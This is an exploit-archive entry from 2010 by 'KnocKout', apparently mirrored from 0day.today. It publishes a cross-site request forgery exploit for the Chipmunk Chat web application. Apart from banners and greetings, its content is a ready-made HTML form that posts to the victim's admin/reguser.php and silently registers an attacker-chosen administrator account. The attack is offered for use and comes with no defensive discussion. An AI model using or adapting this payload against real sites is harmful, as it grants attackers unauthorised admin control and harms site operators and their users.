id: 14415
date: 10/11/2010
title: Chipmunk Chat <= Remote Admin Add CSRF Exploit
author: KnocKout
cves: 

==============================================
Chipmunk Chat <= Remote Admin Add CSRF Exploit
==============================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Chipmunk Chat
~Software: http://www.chipmunk-scripts.com/page.php?ID=19
~Vulnerability Style : Admin Add CSRF
-----------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation| CSRF ADD Html Exploit ~~~~~~~~~~~
<html>
<form method="post" action="http://[VICTIM]/admin/reguser.php">
Type Username Here: <input type="text" name="adminname" size="15"><br>
Type Password Here: <input type="text" name="password" size="15"><br>
Retype password: <input type="text" name="pass2" size="15"><br>
<input type="submit" value="submit">


</form>
</html>

    ================================



#  0day.today [2023-03-23]  #